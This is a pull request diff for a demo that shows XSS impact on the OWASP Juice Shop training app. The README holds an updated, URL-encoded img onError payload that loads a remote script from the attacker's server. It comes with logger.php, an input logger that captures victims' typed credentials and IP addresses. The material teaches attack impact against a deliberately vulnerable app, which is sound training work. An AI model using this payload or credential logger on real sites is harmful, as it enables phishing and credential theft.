### PR TITLE
Update for latest juiceshop

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -2,8 +2,7 @@ FROM php:7.2-apache
 
 ENV TARGET_SOCKET=localhost:8080
 
-COPY shake.js /var/www/html
-COPY logger.php /var/www/html
+COPY shake.js logger.php /var/www/html/
 COPY entrypoint.sh /entrypoint.sh
 
 CMD ["/entrypoint.sh"]

--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ You can use it via docker and docker-compose running:
 ´docker-compose up´
 
 To show the possible impact of [XSS](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)), assume you received and (of course) clicked
-[this inconspicuous phishing link](http://localhost:3000/#/search?q=%3Cscript%3Evar%20js%20%3Ddocument.createElement%28%22script%22%29;js.type%20%3D%20%22text%2Fjavascript%22;js.src%3D%22http:%2F%2Flocalhost:8080%2Fshake.js%22;document.body.appendChild%28js%29;varhash%3Dwindow.location.hash;window.location.hash%3Dhash.substr%280,8%29;%3C%2Fscript%3Eapple)
+[this inconspicuous phishing link](http://localhost:3000/#/search?q=%3Cimg%20src%3D%22bha%22%20onError%3D%27javascript%3Aeval%28%60var%20js%3Ddocument.createElement%28%22script%22%29%3Bjs.type%3D%22text%2Fjavascript%22%3Bjs.src%3D%22http%3A%2F%2Flocalhost%3A8080%2Fshake.js%22%3Bdocument.body.appendChild%28js%29%3Bvar%20hash%3Dwindow.location.hash%3Bwindow.location.hash%3D%22%23%2Fsearch%3Fq%3Dapple%22%3BsearchQuery.value%20%3D%20%22apple%22%3B%60%29%27%3C%2Fimg%3Eapple)
 and login. Apart from the visual/audible effect, the attacker also
 installed [an input logger](http://localhost:8080/logger.php) to grab credentials! This could easily run on a 3rd party server in real life!
 

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -5,7 +5,7 @@ services:
     ports:
      - "3000:3000"
   shake-logger:
-    image: "wurstbrot/shake-logger"
+    build: .
     ports:
      - "8080:80"
     environment:

--- a/logger.php
+++ b/logger.php
@@ -3,8 +3,15 @@
 $logger = "/tmp/logger.php";
 
 if ($_REQUEST['input']) {
-		file_put_contents($logger, 'IP: ' . $_SERVER['REMOTE_ADDR'] . 'Date: ' . date('Y-m-d H:i:s', time()) . ", Text: " . $_REQUEST['input']. "\n", FILE_APPEND);
+        file_put_contents($logger, 'IP: ' . $_SERVER['REMOTE_ADDR'] . 'Date: ' . date('Y-m-d H:i:s', time()) . ", Text: " . $_REQUEST['input']. "\n", FILE_APPEND);
 } else {
-		echo nl2br(file_get_contents($logger));
+?><html>
+<head>
+    <meta http-equiv="refresh" content="5"/>
+</head>
+<body>
+    <?= nl2br(@file_get_contents($logger)); ?>
+</body>
+</html>
+<?php
 }
-


### PR DESCRIPTION
Shake-logger no longer works for the latest version of Juiceshop. This PR uses a new XSS approach that works on the current version. 

* Update sample phishing link to something that works with the current version of Juice Shop (img onError instead of a script tag).
* Remove unnecessary layer from docker image
* Point docker-compose to local Dockerfile instead of published image
* Add a refresh meta to the page returned by `logger.php`